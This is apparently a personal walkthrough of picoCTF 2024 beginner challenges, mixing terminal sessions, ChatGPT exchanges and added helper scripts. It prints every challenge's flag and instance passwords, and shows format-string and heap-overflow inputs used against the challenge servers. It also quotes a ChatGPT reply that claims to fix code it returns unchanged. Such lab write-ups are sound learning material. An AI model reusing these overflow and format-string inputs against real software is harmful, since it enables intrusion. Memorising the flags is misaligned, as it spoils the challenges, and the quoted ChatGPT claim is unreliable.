picoCTF2024

Super SSH 

Description 

Using a Secure Shell (SSH) is going to be pretty important. Can you ssh as ctf-player to titan.picoctf.net at port 57256 to get the flag? You'll also need the password 6abf4a82. If asked, accept the fingerprint with yes. If your device doesn't have a shell, you can use: https://webshell.picoctf.org If you're not sure what a shell is, check out our Primer: https://primer.picoctf.com/#_the_shell 

 

┌──(kali㉿kali)-[~] 

└─$ ssh ctf-player@titan.picoctf.net -p 57256 

The authenticity of host '[titan.picoctf.net]:57256 ([3.139.174.234]:57256)' can't be established. 

ED25519 key fingerprint is SHA256:4S9EbTSSRZm32I+cdM5TyzthpQryv5kudRP9PIKT7XQ. 

This key is not known by any other names. 

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 

Warning: Permanently added '[titan.picoctf.net]:57256' (ED25519) to the list of known hosts. 

ctf-player@titan.picoctf.net's password:  

Welcome ctf-player, here's your flag: picoCTF{s3cur3_c0nn3ct10n_65a7a106} 

Connection to titan.picoctf.net closed. 

 

 

picoCTF{s3cur3_c0nn3ct10n_65a7a106} 


Bookmarklet 

Description 

Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag! 

 

 

Once you go to the webpage, you receive the following code: 

javascript:(function() { 

         var encryptedFlag = "àÒÆަȬë٣֖ÓÚåÛÑ¢ÕӖ¡›ÒŤ›í"; 

         var key = "picoctf"; 

         var decryptedFlag = ""; 

         for (var i = 0; i < encryptedFlag.length; i++) { 

                decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256); 

         } 

         alert(decryptedFlag); 

     })(); 

     

 

Not sure what to do, I asked ChatGPT by copying the above code to chat: 

 

 

It looks like you've provided a JavaScript code snippet that aims to decrypt an encrypted flag using a simple Caesar cipher with a key "picoctf". However, the decryption algorithm seems incorrect, as it attempts to subtract the key character from the encrypted flag character directly. Let me correct the code for you: 


(function() {
    var encryptedFlag = "àÒÆަȬë٣֖ÓÚåÛÑ¢ÕӖ¡›ÒŤ›í";
    var key = "picoctf";
    var decryptedFlag = "";
    for (var i = 0; i < encryptedFlag.length; i++) {
        decryptedFlag += String.fromCharCode((encryptedFlag.charCodeAt(i) - key.charCodeAt(i % key.length) + 256) % 256);
}
    alert(decryptedFlag);
})();
 

This corrected code attempts to decrypt the flag by subtracting the ASCII value of the corresponding key character from the ASCII value of the encrypted flag character, then applying modulo 256 to ensure the result stays within the ASCII character range. Let me know if you need further assistance or if you want to discuss something else! 



how to run this javascript code? 

ChatGPT 


To run this JavaScript code, you can follow these steps: 

Open a Web Browser: You'll need a web browser to execute JavaScript code. 

Open Developer Tools: Most modern web browsers have built-in developer tools that allow you to execute JavaScript code. You can typically open these tools by pressing F12 or Ctrl+Shift+I (Cmd+Option+I on Mac) on your keyboard. This will open the Developer Console. 

Navigate to the Console Tab: In the Developer Tools, you'll find various tabs. Navigate to the "Console" tab. This is where you can input and execute JavaScript code. 

Paste the Code: Once you're in the Console tab, you can simply paste the JavaScript code into the console. 

Run the Code: After pasting the code, press Enter to execute it. The code will run, and if there are no errors, it will display an alert with the decrypted flag. 

 

 

Following the instructions, you get the flag: 

 

picoCTF{p@g3_turn3r_0148cb05} 


Commitment Issues 

AUTHOR: JEFFERY JOHN 

Description 

I accidentally wrote the flag down. Good thing I deleted it! You download the challenge files here: 

 

 

Download the file, unzip it and look around. It is a git repository with a message file. 

 

Try to search for pico in the entire folder: 

 

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ grep -R -i pico .   

./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000commit (initial): create flag 

./.git/logs/refs/heads/master:87b85d7dfb839b077678611280fa023d76e017b8 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 picoCTF <ops@picoctf.com> 1710201977 +0000commit: remove sensitive info 

./.git/logs/HEAD:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000    commit (initial): create flag 

./.git/logs/HEAD:87b85d7dfb839b077678611280fa023d76e017b8 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 picoCTF <ops@picoctf.com> 1710201977 +0000    commit: remove sensitive info 

 

************************* 

The log shows there was a commit that created the flag. So the question is how to restore the old state, that is, how to go back to that commit. 

 

https://primer.picoctf.org/#_git_version_control 

Asked chatGPT again: 

I have this git log "./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 87b85d7dfb839b077678611280fa023d76e017b8 picoCTF <ops@picoctf.com> 1710201977 +0000commit (initial): create flag". How can I go back to this old commit? 


ChatGPT 

To go back to an old commit in Git, you need to use the commit hash or a relative reference to that commit. In your case, the commit hash is 87b85d7dfb839b077678611280fa023d76e017b8. You can follow these steps to go back to this old commit: 

Checkout the Commit: Run the following command in your terminal or Git Bash: 


git checkout 87b85d7dfb839b077678611280fa023d76e017b8
 

This command will switch your repository to the state it was at that specific commit. 


 

******************************* 

                                                                              

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ git checkout 87b85d7dfb839b077678611280fa023d76e017b8 

Note: switching to '87b85d7dfb839b077678611280fa023d76e017b8'. 

  

You are in 'detached HEAD' state. You can look around, make experimental 

changes and commit them, and you can discard any commits you make in this 

state without impacting any branches by switching back to a branch. 

  

If you want to create a new branch to retain commits you create, you may 

do so (now or later) by using -c with the switch command. Example: 

  

  git switch -c <new-branch-name> 

  

Or undo this operation with: 

  

  git switch - 

  

Turn off this advice by setting config variable advice.detachedHead to false 

  

HEAD is now at 87b85d7 create flag 

                                                                              

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Apr 12 14:56 . 

drwxr-xr-x 3 kali kali 4096 Apr 12 14:44 .. 

drwxr-xr-x 8 kali kali 4096 Apr 12 14:56 .git 

-rw-r--r-- 1 kali kali   27 Apr 12 14:56 message.txt 

                                                                              

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$ cat message.txt  

picoCTF{s@n1t1z3_ea83ff2a} 

                                                                              

┌──(kali㉿kali)-[~/Downloads/drop-in] 

└─$
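The grep -R -i pico . run above matched only the reflog files because Git stores file contents as zlib-compressed objects under .git/objects, so the text is not visible to a plain search. The following is an added example, not part of the original write-up: it decompresses loose objects and searches their bodies. The temporary repository and helper names are constructed for the demonstration, and packed objects (.git/objects/pack) are not handled.

```python
import hashlib
import os
import re
import tempfile
import zlib


def write_loose_object(git_dir, obj_type, content):
    """Store content the way Git stores a loose object and return its id."""
    store = f"{obj_type} {len(content)}".encode() + b"\x00" + content
    oid = hashlib.sha1(store).hexdigest()  # object id = SHA-1 of header + body
    path = os.path.join(git_dir, "objects", oid[:2], oid[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(zlib.compress(store))
    return oid


def scan_loose_objects(git_dir, pattern):
    """Return (object id, type, match) for each loose object whose
    decompressed body matches the bytes regex in pattern."""
    objects_dir = os.path.join(git_dir, "objects")
    hits = []
    for prefix in sorted(os.listdir(objects_dir)):
        # Loose objects sit in two-hex-digit directories; "pack" and
        # "info" do not match and are skipped.
        if not re.fullmatch(r"[0-9a-f]{2}", prefix):
            continue
        for name in sorted(os.listdir(os.path.join(objects_dir, prefix))):
            with open(os.path.join(objects_dir, prefix, name), "rb") as fh:
                try:
                    store = zlib.decompress(fh.read())
                except zlib.error:
                    continue  # damaged file or not an object
            header, _, body = store.partition(b"\x00")
            obj_type = header.split(b" ")[0].decode()
            for match in re.finditer(pattern, body):
                hits.append((prefix + name, obj_type,
                             match.group().decode(errors="replace")))
    return hits


def demo():
    """Build a constructed object store and scan it for flag-shaped text."""
    with tempfile.TemporaryDirectory() as tmp:
        git_dir = os.path.join(tmp, ".git")
        # Blob body taken from the message.txt output shown above (27 bytes).
        secret_id = write_loose_object(
            git_dir, "blob", b"picoCTF{s@n1t1z3_ea83ff2a}\n")
        # Constructed decoy blob standing in for the "cleaned" file.
        write_loose_object(git_dir, "blob", b"nothing to see here\n")
        return secret_id, scan_loose_objects(git_dir, rb"picoCTF\{[^}]*\}")


if __name__ == "__main__":
    oid, found = demo()
    print("blob id:", oid)
    for hit in found:
        print(hit)
```

The same scan is a quick check that a "remove sensitive info" commit did not actually remove anything: the old blob stays in the object store until history is rewritten and the objects are pruned.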


interencdec 

AUTHOR: NGIRIMANA SCHADRACK 

Description 

Can you get the real meaning from this file. Download the file here

 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cat enc_flag    

YidkM0JxZGtwQlRYdHFhR3g2YUhsZmF6TnFlVGwzWVROclh6YzRNalV3YUcxcWZRPT0nCg== 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cat enc_flag | base64 -d 

b'd3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzc4MjUwaG1qfQ==' 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ echo d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzc4MjUwaG1qfQ== | base64 -d 

wpjvJAM{jhlzhy_k3jy9wa3k_78250hmj}  

 

 

This is a Caesar cipher; decode it to get: 

picoCTF{caesar_d3cr9pt3d_78250afc} 
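The whole chain above (Base64, a leftover Python b'...' wrapper, Base64 again, then the Caesar shift) can be peeled automatically. This is an added example, not part of the original write-up; the function names are made up here, and the Caesar step assumes the known picoCTF{ prefix as a crib.

```python
import ast
import base64
import binascii
import string

# Contents of enc_flag as shown in the transcript above.
ENC_FLAG = ("YidkM0JxZGtwQlRYdHFhR3g2YUhsZmF6TnFlVGwzWVROclh6YzRNalV3"
            "YUcxcWZRPT0nCg==")


def strip_bytes_repr(text):
    """Undo a Python bytes repr such as b'...' left in by the encoder."""
    text = text.strip()
    if text[:2] in ("b'", 'b"'):
        try:
            value = ast.literal_eval(text)
        except (ValueError, SyntaxError):
            return text
        if isinstance(value, bytes):
            return value.decode("ascii", errors="replace")
    return text


def peel_base64(text, max_layers=10):
    """Decode nested Base64 until the text stops being valid Base64."""
    layers = 0
    while layers < max_layers:
        candidate = strip_bytes_repr(text)
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        text, layers = decoded, layers + 1
    return strip_bytes_repr(text), layers


def caesar_shift(text, shift):
    """Rotate letters by shift; digits, braces and underscores stay as-is."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def crack_caesar(text, crib="picoCTF{"):
    """Try all 26 shifts and return the one that produces the crib."""
    for shift in range(26):
        candidate = caesar_shift(text, shift)
        if candidate.startswith(crib):
            return shift, candidate
    return None


def solve(enc=ENC_FLAG):
    inner, layers = peel_base64(enc)
    shift, flag = crack_caesar(inner)
    return layers, inner, shift, flag


if __name__ == "__main__":
    print(solve())
```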

 


Time machine 

AUTHOR: JEFFERY JOHN 

Description 

What was I last working on? I remember writing a note to help me remember... You can download the challenge files here: 

 

 

Just ask ChatGPT how to check the commit history. 

 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 12 17:04 .. 

drwxr-xr-x 8 kali kali 4096 Mar 11 20:07 .git 

-rw-r--r-- 1 kali kali   87 Mar 11 20:07 message.txt 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat message.txt          

This is what I was working on, but I'd need to look at my commit history to know why...                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log                                               

commit 10228f3d6437701ef5aaac04213757031f30ebec (HEAD -> master) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:24 2024 +0000 

  

    picoCTF{t1m3m@ch1n3_8defe16a} 

 

 

Webdecode  

AUTHOR: NANA AMA ATOMBO-SACKEY 

Description 

Do you know how to use the web inspector? Start searching here to find the flag 

 

 

Go to the website and check the web traffic. Inside about.html there is an attribute with an encoded value: 

 

<section class="about" notify_true="cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDdiOTFjNzl9"> 

   <h1> 

 

 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ echo cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDdiOTFjNzl9 | base64 -d 

picoCTF{web_succ3ssfully_d3c0ded_07b91c79} 

 


format string 0 

Description 

Can you use your knowledge of format strings to make the customers happy? Download the binary here. Download the source here. Connect with the challenge instance here: nc mimas.picoctf.net 63677 

 

 

https://www.fabbbe.se/blog/all_the_format_strings.html  

 

I thought this should be an easy one, so just followed the same method from 2022 picoCTF, but it didn't work. 

 

Later, I read the code again.  

 

   char choice1[BUFSIZE]; 

    scanf("%s", choice1); 

char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"}; 

if (!on_menu(choice1, menu1, 3)) { 

        printf("%s", "There is no such burger yet!\n"); 

        fflush(stdout); 

} else { 

 

 

So it expects the input to be one of the three options in menu1; I missed this part last time. 

 

The option to enter for the first question contains the format specifier %114d, and the option for the second question contains %s three times (%s%s%s). 

 

So the purpose of this challenge is to test whether you understand which kinds of format strings can be used in an attack. 

 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc mimas.picoctf.net 63677 

Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger? 

Here comes the first customer Patrick who wants a giant bite. 

Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe 

Enter your recommendation: Gr%114d_Cheese 

Gr                                                                                                       4202954_Cheese 

Good job! Patrick is happy! Now can you serve the second customer? 

Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!) 

Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak 

Enter your recommendation: Cla%sic_Che%s%steak 

ClaCla%sic_Che%s%steakic_Che(null) 

picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_c8362f05} 
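To make the point about the menu items concrete, this added example (not the challenge's source, and not from the original write-up) lists the printf conversions hidden in each menu string from the transcript. The regular expression is an approximation of the C printf grammar and the function names are made up here.

```python
import re

# One printf conversion: %[n$][flags][width][.precision][length]conversion
SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0']*"
    r"(?P<width>\*|\d+)?"
    r"(?:\.(?P<prec>\*|\d*))?"
    r"(?:hh|ll|[hljztLq])?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

# Conversions that dereference an argument as a pointer.
POINTER_CONVS = {
    "s": "reads memory through a pointer argument",
    "n": "writes memory through a pointer argument",
}

# Menu strings copied from the challenge transcript above.
MENU1 = ["Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"]
MENU2 = ["Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"]


def scan_format(text):
    """Return the conversions printf would act on if text were the format."""
    findings = []
    for m in SPEC.finditer(text):
        conv = m.group("conv")
        if conv == "%":
            continue  # "%%" prints a literal percent sign, no argument
        # A "*" width or precision takes one extra int argument each.
        args = 1 + (m.group("width") == "*") + (m.group("prec") == "*")
        findings.append({
            "spec": m.group(0),
            "args_consumed": args,
            "effect": POINTER_CONVS.get(conv, "prints an argument value"),
        })
    return findings


def specs(text):
    """Just the conversion strings, in order of appearance."""
    return [f["spec"] for f in scan_format(text)]


def audit(menu):
    """Map each menu item to the conversions it would trigger."""
    return {item: specs(item) for item in menu}


if __name__ == "__main__":
    for menu in (MENU1, MENU2):
        for item, found in audit(menu).items():
            print(f"{item!r:24} -> {found}")
```

Any string for which scan_format returns findings is only safe to print through a fixed format, as in printf("%s", input); the source excerpt above already uses that form for its error message.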

                  

 

 

heap 0 


Description 

Are overflows just a stack concern? Download the binary here. Download the source here. Connect with the challenge instance here: nc tethys.picoctf.net 54352 

 

 

I downloaded the code, asked ChatGPT if there is a heap overflow, and then asked: 

how can I verify the heap overflow in the original code? 

 

 

 

 

I tested it on local box first: 

 

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 2 

Data for buffer: ytyutjgjhgjhgjhgjjjjjjjjjjjjjjjjjjjjjjjjjjj 

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 1 

Heap State: 

+-------------+----------------+ 

[*] Address   ->   Heap Data    

+-------------+----------------+ 

[*]   0x55c33916f6b0  ->   ytyutjgjhgjhgjhgjjjjjjjjjjjjjjjjjjjjjjjjjjj 

+-------------+----------------+ 

[*]   0x55c33916f6d0  ->   jjjjjjjjjjj 

+-------------+----------------+ 

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 3 

  

  

Take a look at my variable: safe_var = jjjjjjjjjjj 

  

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 4 

  

YOU WIN 

zsh: segmentation fault  ./chall 

 

 

Let me try on the remote CTF machine: 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 54352 

  

Welcome to heap0! 

I put my data on the heap so it should be safe from any tampering. 

Since my data isn't on the stack I'll even let you write whatever info you want to the heap, I already took care of using malloc for you. 

  

Heap State: 

+-------------+----------------+ 

[*] Address   ->   Heap Data    

+-------------+----------------+ 

[*]   0x5dd6bb01f2b0  ->   pico 

+-------------+----------------+ 

[*]   0x5dd6bb01f2d0  ->   bico 

+-------------+----------------+ 

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 2 

Data for buffer: ghfhgfhjfhghghhhhhhhhhhhhhhhhhhhhhhhhh 

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 3 

  

  

Take a look at my variable: safe_var = hhhhhh 

  

  

1. Print Heap:      (print the current state of the heap) 

2. Write to buffer: (write to your own personal block of data on the heap) 

3. Print safe_var:  (I'll even let you look at my variable on the heap, I'm confident it can't be modified) 

4. Print Flag:      (Try to print the flag, good luck) 

5. Exit 

  

Enter your choice: 4 

  

YOU WIN 

picoCTF{my_first_heap_overflow_1ad0e1a6} 

                                         

 

 

picoCTF{my_first_heap_overflow_1ad0e1a6} 

 



Scan Surprise 

Description 

I've gotten bored of handing out flags as text. Wouldn't it be cool if they were an image instead? You can download the challenge files here: 

Additional details will be available after launching your challenge instance. 

 

 

Unzip the file and you get a QR code, scan it and you will get the flag: 

 

picoCTF{p33k_@_b00_b5ce2572}  




Verify 

Description 

People keep trying to trick my players with imitation flags. I want to make sure they get the real thing! I'm going to provide the SHA-256 hash and a decrypt script to help you know that my flags are legitimate. You can download the challenge files here: 

The same files are accessible via SSH here: ssh -p 64690 ctf-player@rhea.picoctf.net Using the password 1ad5be0d. Accept the fingerprint with yes, and ls once connected to begin. Remember, in a shell, passwords are hidden! 

 

 

So, the instruction is to find the file whose SHA-256 checksum matches the one above, then decrypt that file with the command. 

 

I asked ChatGPT:  

-write a bash script that can calculate sha256 hash on all the files under the current directory on Linux. 

 

It gave me a script, but I cannot open vi to create a file. So, I asked it to provide me a one line script: 

 

can you make a one line bash? 

ChatGPT 


Sure, you can use the find command along with sha256sum to achieve this in a single line: 


 

find . -type f -exec sha256sum {} + 

 

This command will find all files (excluding directories) in the current directory and its subdirectories, then calculate the SHA256 hash for each file found. It will output the filename along with its corresponding SHA256 hash. 

 

Sort the result so you can easily spot the value that matches the checksum. 

 

ctf-player@pico-chall$ find . -type f -exec sha256sum {} + | sort 

 

5848768e56185707f76c1d74f34f4e03fb0573ecc1ca7b11238007226654bcda  ./8eee7195 

 

 

ctf-player@pico-chall$ cp ./8eee7195 ../. 

ctf-player@pico-chall$ cd .. 

ctf-player@pico-chall$ ls  

8eee7195  checksum.txt  decrypt.sh  files 

ctf-player@pico-chall$ decrypt.sh 8eee7195  

picoCTF{trust_but_verify_8eee7195} 

ctf-player@pico-chall$  

 


Blame game 


Description 

Someone's commits seems to be preventing the program from working. Who is it? You can download the challenge files here: 

 

 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat message.py  

print("Hello, World!" 

 

So the Python code is not correct: the closing parenthesis is missing. 

                                                                             

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 16 17:27 .. 

drwxr-xr-x 8 kali kali 4096 Mar 11 20:07 .git 

-rw-r--r-- 1 kali kali   22 Mar 11 20:07 message.py 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log 

commit 572ef8669e27c6c3cb78e98733405c3c210b0b8b (HEAD -> master) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:13 2024 +0000 

  

important business work 

 

There are many log entries. 

 

 

Ask ChatGPT: 

how to check the author who made the last git commit 

ChatGPT 


To check the author who made the last git commit, you can use the git log command with the -1 option to display just the last commit, and then use --format to specify the output format. Here's how you can do it: 

git log -1 --format="%an <%ae>" 

 

This command will display the author's name and email address for the last commit in the repository. 

You can also use %aN for the author's name without the email address, and %aE for the author's email address without the name. 

 

So use this command to list the authors of all past commits, and at the end you will see the special one. 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log  --format="%an <%ae>" 

 

 

 

picoCTF <ops@picoctf.com> 

picoCTF{@sk_th3_1nt3rn_2c6bf174} <ops@picoctf.com> 

picoCTF <ops@picoctf.com> 

 

 

I feel this is probably not the correct way to solve this problem. To be more specific, we need to find the author who committed this Python code... 

 

Or you can find the information at: 

 

/home/kali/Downloads/pico/drop-in/.git/logs/refs/heads 



Collaborative Development 


Description 

My team has been working very hard on new features for our flag printing program! I wonder how they'll work together? You can download the challenge files here: 

 

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py    

print("Printing the flag...") 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cd .git     

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git log                       

commit eb19d0e3c28278752f0735c4451b885136a24105 (HEAD -> main) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:49 2024 +0000 

  

    init flag printer 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git checkout eb19d0e3c28278752f0735c4451b885136a24105 

fatal: this operation must be run in a work tree 

 

            

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git branch -a                                         

* (HEAD detached at eb19d0e) 

  feature/part-1 

  feature/part-2 

  feature/part-3 

  main 

  

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ cd main 

cd: no such file or directory: main 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ git checkout main                                     

fatal: this operation must be run in a work tree 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in/.git] 

└─$ cd ..   

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout main 

Switched to branch 'main' 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git log           

commit eb19d0e3c28278752f0735c4451b885136a24105 (HEAD -> main, yt) 

Author: picoCTF <ops@picoctf.com> 

Date:   Tue Mar 12 00:07:49 2024 +0000 

  

    init flag printer 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls -al 

total 16 

drwxr-xr-x 3 kali kali 4096 Mar 11 20:07 . 

drwxr-xr-x 3 kali kali 4096 Apr 16 18:03 .. 

-rw-r--r-- 1 kali kali   30 Mar 11 20:07 flag.py 

drwxr-xr-x 8 kali kali 4096 Apr 17 14:44 .git 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py  

print("Printing the flag...") 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-1 

Switched to branch 'feature/part-1' 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ ls     

flag.py 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py  

print("Printing the flag...") 

print("picoCTF{t3@mw0rk_", end='')                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-2 

Switched to branch 'feature/part-2' 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py                 

print("Printing the flag...") 

  

print("m@k3s_th3_dr3@m_", end='')                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ git checkout feature/part-3 

Switched to branch 'feature/part-3' 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$ cat flag.py                 

print("Printing the flag...") 

  

print("w0rk_2c91ca76}") 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico/drop-in] 

└─$  

 

So in this challenge, there are three branches and you need to put all three pieces from them together. 

 

 

picoCTF{t3@mw0rk_m@k3s_th3_dr3@m_w0rk_2c91ca76} 




binhexa 

AUTHOR: NANA AMA ATOMBO-SACKEY 

Description 

How well can you perform basic binary operations? Start searching for the flag here nc titan.picoctf.net 63103 

 
 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc titan.picoctf.net 63103 

  

Welcome to the Binary Challenge!" 

Your task is to perform the unique operations in the given order and find the final result in hexadecimal that yields the flag. 

  

Binary Number 1: 00111100 

Binary Number 2: 01101010 

  

  

Question 1/6: 

Operation 1: '>>' 

Perform a right shift of Binary Number 2 by 1 bits . 

Enter the binary result: 00110101 

Correct! 

  

Question 2/6: 

Operation 2: '+' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 10100110 

Correct! 

  

Question 3/6: 

Operation 3: '*' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 1100011011000 

Correct! 

  

Question 4/6: 

Operation 4: '&' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 00101000 

Correct! 

  

Question 5/6: 

Operation 5: '<<' 

Perform a left shift of Binary Number 1 by 1 bits. 

Enter the binary result: 01111000 

Correct! 

  

Question 6/6: 

Operation 6: '|' 

Perform the operation on Binary Number 1&2. 

Enter the binary result: 01111110 

Correct! 

  

Enter the results of the last operation in hexadecimal: 3F2 

Incorrect answer! 

  

Enter the results of the last operation in hexadecimal: 7E 

  

Correct answer! 

The flag is: picoCTF{b1tw^3se_0p3eR@tI0n_su33essFuL_d6f8047e} 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

 



CanYouSee 

Description 

How about some hide and seek? Download this file here

 

 

picoCTF{ME74D47A_HIDD3N_b32040b8} 

 

Unzip the file: 

 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ strings ukn_reality.jpg | grep pico 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ exiftool ukn_reality.jpg  

ExifTool Version Number     : 12.57 

File Name                   : ukn_reality.jpg 

Directory                   : . 

File Size                   : 2.3 MB 

File Modification Date/Time : 2024:03:11 20:05:53-04:00 

File Access Date/Time       : 2024:04:17 15:02:29-04:00 

File Inode Change Date/Time : 2024:04:17 15:02:29-04:00 

File Permissions            : -rw-r--r-- 

File Type                   : JPEG 

File Type Extension         : jpg 

MIME Type                   : image/jpeg 

JFIF Version                : 1.01 

Resolution Unit             : inches 

X Resolution                : 72 

Y Resolution                : 72 

XMP Toolkit                 : Image::ExifTool 11.88 

Attribution URL             : cGljb0NURntNRTc0RDQ3QV9ISUREM05fYjMyMDQwYjh9Cg== 

Image Width                 : 4308 

Image Height                : 2875 

Encoding Process            : Baseline DCT, Huffman coding 

Bits Per Sample             : 8 

Color Components            : 3 

Y Cb Cr Sub Sampling        : YCbCr4:2:0 (2 2) 

Image Size                  : 4308x2875 

Megapixels                  : 12.4 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ echo cGljb0NURntNRTc0RDQ3QV9ISUREM05fYjMyMDQwYjh9Cg== | base64 -d 

picoCTF{ME74D47A_HIDD3N_b32040b8} 

                                    



IntroToBurp 

Description 

Try here to find the flag 

 

 

Use Burp to intercept the traffic. The first step is to enter some data for registration, the second step is to enter data for OTP.  

 

